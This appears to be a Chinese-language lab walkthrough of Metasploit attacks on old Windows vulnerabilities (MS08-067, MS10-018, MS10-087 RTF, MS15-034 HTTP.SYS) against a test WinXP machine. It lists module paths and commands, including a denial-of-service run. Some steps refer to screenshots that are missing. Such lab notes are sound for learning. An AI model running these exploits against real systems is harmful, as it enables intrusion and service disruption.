💟网络服务器攻击渗透（MS08-067）

首先search ms08-067漏洞然后info查看

查看工具配置

这张图写快了是反向连接😂

浏览器攻击渗透（MS10-018）

show options查看配置

我们让目标机访问下这个url，这时msfconsole中就出现了successfuully，我们按回车（这里我尝试了好久，每次靶机访问IE就跳出OD来，最后把靶机里面的OD删掉就好了）。

sessions -i 1进入会话

应用软件格式渗透，利用word去渗透（MS10-087）

用到的靶机为：WinXPenSP3。

打开msfconsole

搜索下ms10-018的路径：search ms10-087。

使用这个模块：

Use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof

执行show options配置环境

这里有payload，我们就不配了。老版本就要配置

我们把文件名改成ceshi。我们设置现在让他弹出一个计算器：set CMD calc.exe。

显示隐藏文件找到生成文件

找到后利用刚刚ms10-018上传运行

CVE-2015-1635-HTTP.SYS远程执行代码漏洞（ms15-034）：

（1）利用ms15-034漏洞读取服务器内存数据

（2）利用ms15-034漏洞进行ddos攻击

use auxiliary/dos/http/ms15_034_ulonglongadd //打开这个漏洞模块

set

rhosts 192.168.80.130//配置目标IP

set

threads 10//配置10个线程

run//运行